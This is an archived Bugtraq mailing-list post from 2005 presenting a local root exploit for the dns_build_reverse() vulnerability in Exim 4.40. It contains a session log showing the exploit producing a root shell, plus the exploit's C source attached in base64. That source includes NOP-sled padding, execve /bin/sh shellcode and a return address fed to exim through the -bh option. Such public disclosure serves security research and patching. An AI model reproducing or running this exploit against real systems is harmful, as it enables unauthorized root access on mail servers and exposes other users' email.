[38966] in bugtraq
exim 4.40 exploit
daemon@ATHENA.MIT.EDU (plugger)
Wed May 25 13:47:53 2005
From: "plugger" <plug@internode.on.net>
Reply-To: plug@internode.on.net
To: bugtraq@securityfocus.com
Date: Tue, 24 May 2005 23:12:37 +0950
Message-id: <42932f4d.2d.4445.4572@internode.on.net>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="-=_webmail1.adl242932f4d"
This is a multi-part message in MIME format.
---=_webmail1.adl242932f4d
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
hello punters,
i was bored last night so I coded up a local exploit of the
dns_build_reverse() vulnerability in exim 4.40. hope noone
minds as it was disclosed 5 months ago.
tested on exim 4.40 default build with runtime user as root
rather than exim or mail - hence the rootshell. see below
for versions and system details. "exploit" attached.
regards
plug
=3d=3d=3d=3d=3d=3d=3d=3d=3d=3d=3d=3d
the details
=3d=3d=3d=3d=3d=3d=3d=3d=3d=3d=3d=3d
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686
GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52:
(December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm
dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram
redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!
**** SMTP testing session as if from host
::%A:::::::::::::::::1=c0FF V
=b0 N=cd1=db=d8@=cd=e8=dc=ff=ff=ff/bin/sh=f4=f2=ff=bf
**** but without any ident (RFC 1413) callback.
=f3
**** This is not for real!
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1=c0FF V
=b0
N=cd1=db=d8@=cd=e8=dc=ff=ff=ff/bin/sh=f4=f2=ff=bf
>>> IP address lookup using gethostbyaddr() =f3
>>> IP address lookup failed: h_errno=3d1
LOG: no host name found for IP address
::%A:::::::::::::::::1=c0FF V
=b0 N=cd1=db=d8@=cd=e8=dc=ff=ff=ff/bin/sh=f4=f2=ff=bf
sh-2.05b#
=f3
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$
---=_webmail1.adl242932f4d
Content-Type: application/octet-stream; name="exim-exploit.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="exim-exploit.c"
LyogCiAqIHJpcHBlZCBzdHJhaWdodCBvZmYgaURFRkVOU0UgYWR2aXNvcnkg
LSBzbyBsYXp5IEkganVzdCBwaWNrZWQKICogdXAgR0RCLi4uIGJvcmVkIG9u
IGEgd2Vla25pZ2h0IDooCiAqIAogKiBub3RoaW5nIHRvIHdyaXRlIGhvbWUg
dG8gbW90aGVyIGFib3V0IGR1ZSB0byB0aGUgZmFjdCB0aGF0CiAqIHlvdSBu
ZWVkIGEgbG9jYWwgdXNlciBhY2NvdW50IG9uIGEgc2VydmVyIGFuZCBhbGwg
eW91CiAqIGdldCBpcyB0byByZWFkIG90aGVyIHBlb3BsZSdzIGVtYWlscyAu
Li4uCiAqIAogKiBub3QgZXZlbiBteSBvd24gc2hlbGxjb2RlLiBhbGVwaDEg
c2hlbGxjb2RlIC0gY3V0IGFuZCBwYXN0ZSBqb2IgCiAqIHdpdGggbm9wcyB0
byBwYWQuCiAqCiAqIFJlZ2FyZHMsCiAqIFBsdWdnZXIgYWthIFRvbnkgTG9j
a2V0dAogKgogKiAKICogCiAqLwoKY2hhciBib21iWzI4OF09CgovKiB0aGUg
Z2VhciBmcm9tIGlERUZFTlNFICovCiI6OiVBOjo6Ojo6Ojo6Ojo6Ojo6Ojoi
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiAyMSBieXRlcyAgKi8K
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIC8qIC0tLS0tLS0tICAqLwovKiBOT1BTIGZvciBwYWRkaW5nICov
CiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBc
eDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBc
eDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBc
eDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5
MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJc
eDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4
OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkw
XHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4
OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkw
XHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4
OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkw
XHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4
OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiCiJceDkw
XHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAi
CiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBc
eDkwXHg5MFx4OTAiCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTBceDkwXHg5MFx4OTAiCiJceDkwXHg5MCIgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAvKiAyMTggYnl0ZXMgKi8KICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIC8qIC0tLS0tLS0tLSAqLwovKiBhY3R1YWwgY29kZSBjb3VydGVzeSBB
bGVwaDEgKi8KIlx4ZWJceDFmXHg1ZVx4ODlceDc2XHgwOFx4MzFceGMwXHg4
OFx4NDZceDA3XHg4OSIgIC8qIDEyIGJ5dGVzICAqLwoiXHg0Nlx4MGNceGIw
XHgwYlx4ODlceGYzXHg4ZFx4NGVceDA4XHg4ZFx4NTZceDBjIiAgLyogMTIg
Ynl0ZXMgICovCiJceGNkXHg4MFx4MzFceGRiXHg4OVx4ZDhceDQwXHhjZFx4
ODAiICAgICAgICAgICAgICAvKiA5IGJ5dGVzICAgKi8KIlx4ZThceGRjXHhm
Zlx4ZmZceGZmL2Jpbi9zaCIgICAgICAgICAgICAgICAgICAgICAgIC8qIDEy
IGJ5dGVzICAqLwoKLyogd2hlcmUgRUlQIHNob3VsZCBwb2ludCAqLwoiXHhm
NFx4ZjJceGZmXHhiZiI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgLyogIDQgYnl0ZXMgICovCiAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAvKiAtLS0tLS0tLSAgKi8KICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIC8qIDQ5IGJ5dGVzICAqLwogICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgLyogLS0tLS0tLS0gICovCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAvKiAyODggYnl0ZXMgKi8KICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qID09PT09PT09PSAqLwpt
YWluKCkKewogIGNoYXIgKmV4aW1bNF07CiAgZXhpbVswXSA9ICIvdXNyL2V4
aW0vYmluL2V4aW0iOwogIGV4aW1bMV0gPSAiLWJoIjsKICBleGltWzJdID0g
Ym9tYjsKICBleGltWzNdID0gMHgwOwogIHByaW50ZigiRmlyaW5nIHVwIGV4
aW0gLSBjcm9zcyB5b3VyIGZpbmdlcnMgZm9yIHNoZWxsIVxuIik7CiAgZXhl
Y3ZlKGV4aW1bMF0sZXhpbSwweDApOwogIHJldHVybjsKfQoKCg==
---=_webmail1.adl242932f4d--
